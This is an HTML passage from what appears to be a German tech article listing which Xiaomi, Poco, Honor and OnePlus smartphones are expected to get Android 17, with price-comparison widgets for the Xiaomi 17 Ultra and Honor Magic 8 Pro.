<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3078239/xiaomi-17-test.html" target="_blank" rel="noreferrer noopener">17</a> / Pro / Pro Max / <a href="https://www.pcwelt.de/article/3131894/xiaomi-17-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li><a href="https://www.pcwelt.de/article/2635137/xiaomi-15-test.html" target="_blank" rel="noreferrer noopener">15</a> / <a href="https://www.pcwelt.de/article/2641294/xiaomi-15-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / Pro</li>



<li><a href="https://www.pcwelt.de/article/2924488/xiaomi-15t-test.html" target="_blank" rel="noreferrer noopener">15 T</a> / <a href="https://www.pcwelt.de/article/2924662/xiaomi-15t-pro-test-2.html" target="_blank" rel="noreferrer noopener">15 T Pro</a></li>



<li>15S Pro</li>



<li><a href="https://www.pcwelt.de/article/2250161/xiaomi-14-hands-on.html" target="_blank" rel="noreferrer noopener">14</a> / <a href="https://www.pcwelt.de/article/2313696/das-xiaomi-14-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a> / <a href="https://www.pcwelt.de/article/2489914/test-xiaomi-14t-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>14 T / 14 T Pro</li>



<li>13T /<a href="https://www.pcwelt.de/article/2086566/xiaomi-13t-pro-test.html" target="_blank" rel="noreferrer noopener"> Pro</a></li>



<li><a href="https://www.pcwelt.de/article/3060842/xiaomi-redmi-note-15-5g-test.html" target="_blank" rel="noreferrer noopener">Redmi Note 15</a> / <a href="https://www.pcwelt.de/article/3029932/xiaomi-redmi-note-15-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3044182/xiaomi-redmi-note-15-pro-plus-5g-test.html" target="_blank" rel="noreferrer noopener">Pro+</a></li>



<li>Redmi Note 14 / Pro / Pro+</li>



<li>Poco X8 / Pro / <a href="https://www.pcwelt.de/article/3105908/tpoco-x8-pro-max-test.html" target="_blank" rel="noreferrer noopener">Pro Max</a></li>



<li>Poco F8 / <a href="https://www.pcwelt.de/article/3012838/poco-f8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3012817/xiaomi-poco-f8-ultra-test.html" target="_blank" rel="noreferrer noopener">Ultra</a></li>



<li>Poco M8 / <a href="https://www.pcwelt.de/article/3072287/poco-m8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco X7 / <a href="https://www.pcwelt.de/article/2573751/xiaomi-poco-x7-pro-amazon-angebot-early-bird-rabatt.html" target="_blank" rel="noreferrer noopener">Pro</a> </li>



<li><a href="https://www.pcwelt.de/article/2828306/xiaomi-poco-f7-test.html" target="_blank" rel="noreferrer noopener">Poco F7</a> / <a href="https://www.pcwelt.de/article/2653239/poco-f7-pro-martphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco F6 / <a href="https://www.pcwelt.de/article/2356099/das-poco-f6-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Poco M7 / Pro</li>



<li>Mix Fold 4</li>



<li>Mix Flip </li>
</ul>



<p><strong>Voraussichtlich kein Android-Update mehr:</strong> Xiaomi 13 Lite, 13 Pro, Redmi K60 Ultra, Redmi K70 Ultra, Redmi Turbo 3, Poco X6, X6 Pro, X6 5G, Poco M6 Plus, Mix Fold 3.</p>



<p><strong>Xiaomi 17 Ultra im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/24204.png" alt="coolblue" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.189,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260621&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=e6Z83DiuG2XgFdiMIpCMzPcSuEO_gveORq5LL3gM66Ia1PEpRmj4c_s8jMdfIw9M2Kj4qrzm9aTRQhe5t4cwIC8NWSccOLGh1ennJFMKED9sM8E9IH9LWP169nq5fkCQoCJKtTlI8B-&amp;mid=686101017582&amp;id=686101017582&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.189,00 €" data-vars-product-vendor="coolblue" aria-label="Deal anschauen bei coolblue für 1.189,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/4541.png" alt="notebooksbilliger" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.189,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kt1XCJM1FqeRDMrEUYsO-lVt6WZAp33caFQNuxad7411g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260621&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=kt1XCJM1FqeRDMrEUYsO-lVt6WZAp33caFQNuxad7411g7_hVoNHUlypbjqnDWPQIkZKpwcYI7d7CHt1qlFu5LyNrnCfAv08CvI4ur_8-1Rxg34j7QDYZF7ZJFUfe4jgUyWbwcakYeT&amp;mid=686106064556&amp;id=686106064556&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.189,00 €" data-vars-product-vendor="notebooksbilliger" aria-label="Deal anschauen bei notebooksbilliger für 1.189,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/9999.png" alt="Amazon Marketplace CE" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.246,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aUr2h88O-ZVgFdiMIpCMzOm2o9VxuzgTVdJ2CJUU4vKWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260621&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=aUr2h88O-ZVgFdiMIpCMzOm2o9VxuzgTVdJ2CJUU4vKWAgE2o8Zl9Lbuc_gm3yF6igrPtbg61YQAOSdlbk_iFsIwM9sg9Tk1H7f2UgQlR_XAtko0dkSSUyIYAvavBRl1RjFOVFXHH32&amp;mid=686321214724&amp;id=686321214724&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.246,90 €" data-vars-product-vendor="Amazon Marketplace CE" aria-label="Deal anschauen bei Amazon Marketplace CE für 1.246,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/21515.png" alt="JB-Computer" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.392,85 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=JHfoYfceOk9vsU1Wdh-mdc5Hd99OQeF7TGlRE1PieSi63YeDFtoR-orhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260621&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=JHfoYfceOk9vsU1Wdh-mdc5Hd99OQeF7TGlRE1PieSi63YeDFtoR-orhTgXH2lveUzBBhPJp6i_Vyf_7bZiqRX691PQF-8JW9rmuz2eBcqG4IEGjtyRLZ7cGkluzcYlVenRmPhh8kBN&amp;mid=686413403941&amp;id=686413403941&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.392,85 €" data-vars-product-vendor="JB-Computer" aria-label="Deal anschauen bei JB-Computer für 1.392,85 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260621&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=O14GZp9jgFjtiDOfdN0LnJe3tbSWKwr5StjRvcvK9gAEbEokfk-c7Dg2RH8nVS-07oFn43uV-nFhHtU87wR-8ZA7FvRP3EFqjzdrMyOro6riGAL2rwUZdU6UbQhTdBmv0yWbwcakYeT&amp;mid=686069531716&amp;id=686069531716&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.499,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260621&amp;log=rss" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=g58RkILoWKjgFdiMIpCMzOvm45kg1DyzFdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_CgrPtbg61YQAOSdlbk_iFtFCF7m3hzAgLw1ZJxw4saHV6eckUwoQP1IKRqKMIF-sICJKtTlI8B-&amp;mid=686389858219&amp;id=686389858219&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.499,90 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/xiaomi-logo.svg" alt="Xiaomi" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.499,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-name="Xiaomi 17 Ultra" data-vars-product-id="3074391" data-vars-category="Smartphones" data-vars-manufacturer-id="15959" data-vars-manufacturer="Xiaomi" data-vars-vendor="billiger,amazon,gtin,mpn,Xiaomi" data-vars-po="billiger,amazon,gtin,mpn" data-product="3074391" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.mi.com/de/product/xiaomi-17-ultra/buy/" data-vars-product-price="1.499,90 €" data-vars-product-vendor="Xiaomi" aria-label="Deal anschauen bei Xiaomi für 1.499,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Honor</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378ef9d73c6"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/IMG_9620.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Honor Magic V6" class="wp-image-3077615" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Chris Hall / Foundry</p></div>



<p>Honor ist ebenfalls einer der Hersteller, die länger Android-Updates an ihre Geräte ausliefern. Bis zu sieben Jahre ist der Update-Zyklus hier, was aber vor allem für Flaggschiff-Modelle gilt.</p>



<p>Diese Honor-Smartphones bekommen wahrscheinlich das Update auf Android 17:</p>



<p><strong>Sollten auch Android 17 bekommen:</strong></p>



<ul class="wp-block-list">
<li><a href="https://www.pcwelt.de/article/3143704/honor-600-test.html" target="_blank" rel="noreferrer noopener">600</a> / Pro</li>



<li>Magic 8 / <a href="https://www.pcwelt.de/article/3041397/honor-magic-8-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a> / <a href="https://www.pcwelt.de/article/3011397/honor-magic-8-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V6</li>



<li><a href="https://www.pcwelt.de/article/2838914/honor-magic-v5-test.html" target="_blank" rel="noreferrer noopener">Magic V5</a></li>



<li><a href="https://www.pcwelt.de/article/2795141/honor-400-smartphone-test.html" target="_blank" rel="noreferrer noopener">400</a> / <a href="https://www.pcwelt.de/article/2801931/honor-400-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>200 / <a href="https://www.pcwelt.de/article/2379154/honor-200-pro-smartphone-test.html" target="_blank" rel="noreferrer noopener">Pro </a>/ Lite / Smart</li>



<li>Magic 6 / <a href="https://www.pcwelt.de/article/2286476/das-honor-magic-6-pro-test.html" target="_blank" rel="noreferrer noopener">Pro</a></li>



<li>Magic 7 / Pro / <a href="https://www.pcwelt.de/article/2602028/honor-magic-7-lite-test.html" target="_blank" rel="noreferrer noopener">Lite</a></li>



<li>Magic V Flip</li>
</ul>



<p><strong>Voraussichtlich kein Android 17: </strong>Magic 5, Magic 5 Pro, Magic V2, Magic V3, Magic VS, X50 Pro, X60 Pro, Honor 90, Honor 90 Lite.</p>



<p><strong>Honor Magic 8 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  amazon_vendor">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/amazon-logo.svg" alt="Amazon" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>911,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0G261N9WT?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="911,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 911,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://s24.media/shop/11af34f513114e17ab24f15ca5083429" alt="Baur Versand" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>954,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://lg.s24.cloud/catalog/9116/189565/9392672955" data-vendor-api="shopping24" data-vars-product-price="954,99 €" data-vars-product-vendor="Baur Versand" aria-label="Deal anschauen bei Baur Versand für 954,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/934.png" alt="baur.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>954,99 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=3xx87bnKlcJgFdiMIpCMzPwTvVF8IsxOUbN7aF8bFrTARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260621&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=3xx87bnKlcJgFdiMIpCMzPwTvVF8IsxOUbN7aF8bFrTARtB_6hWBpS6BZ-N7lfpxeR7mpbcJ3AWca27OwY67kN-RKfLh1_vX0mnF9_zg5FqpYJM4Mj0GBKLOc9Pk0Zd8D1fDJMgT8f4cyMPVnhNFSE&amp;mid=685927853020&amp;id=685927853020&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="954,99 €" data-vars-product-vendor="baur.de" aria-label="Deal anschauen bei baur.de für 954,99 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/3667.png" alt="OTTO" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>969,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=A1X9m0gdxumf7aDQSDOyE7CKaG8FITs4FdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_G7OfJuvmdYJVPoqacKphKIai9bm1G-GO_9b1SEqOQXKJohhjmWN-a6-8R6lrAC6sfmW34S_ZA8J&amp;mid=686422767571&amp;id=686422767571&amp;ts=20260621&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=A1X9m0gdxumf7aDQSDOyE7CKaG8FITs4FdJ2CJUU4vKMdozeyQB1s3_NYWZJZdx_G7OfJuvmdYJVPoqacKphKIai9bm1G-GO_9b1SEqOQXKJohhjmWN-a6-8R6lrAC6sfmW34S_ZA8J&amp;mid=686422767571&amp;id=686422767571&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="969,90 €" data-vars-product-vendor="OTTO" aria-label="Deal anschauen bei OTTO für 969,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__hidden-records-wrapper">
									<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://cdn.billiger.com/dynimg/shops/x/15554.png" alt="Proshop.de" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260621&amp;log=rss" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://cmodul.solutenetwork.com/common/modules/api/cmodul?mc=wEWdDETYqSoy&amp;p=pHRxbDWykKyVf28VzW0Dp4eF8ZBoGX1qxg-YXv85Enz6RmIsvl8L8XwpgNs8FzmZYp5eUIvJnUoWpTlsYps_pr35ee4oVQhsIs5z0-TRl3wiGAL2rwUZdUm_xakFycbG0yWbwcakYeT&amp;mid=686055395438&amp;id=686055395438&amp;ts=20260621&amp;log=rss" data-vendor-api="billiger" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Proshop.de" aria-label="Deal anschauen bei Proshop.de für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
										<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<img decoding="async" src="https://www.pcwelt.de/wp-content/themes/idg-base-theme/dist/static/img/honor-logo.svg" alt="Honor" loading="lazy">
													</div>
												<div class="price-comparison__price ">
						<span>1.299,90 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-name="Honor Magic 8 Pro" data-vars-product-id="3028635" data-vars-category="Smartphones" data-vars-manufacturer-id="16149" data-vars-manufacturer="Honor" data-vars-vendor="billiger,gtin,amazon,mpn,Honor" data-vars-po="billiger,gtin,amazon,mpn" data-product="3028635" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.awin1.com/cread.php?awinmid=28525&amp;awinaffid=486277&amp;clickref=rss&amp;platform=dl&amp;ued=https://www.honor.com/de/phones/honor-magic8-pro/buy/" data-vars-product-price="1.299,90 €" data-vars-product-vendor="Honor" aria-label="Deal anschauen bei Honor für 1.299,90 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
									</div>
									<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
											<button class="price-comparison__view-more-button">
							Weitere Angebote						</button>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">OnePlus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a378ef9dd7ed"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/03/OnePlus-15T-green.jpg?quality=50&amp;strip=all&amp;w=1200" alt="OnePlus 15T green" class="wp-image-3084428" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" 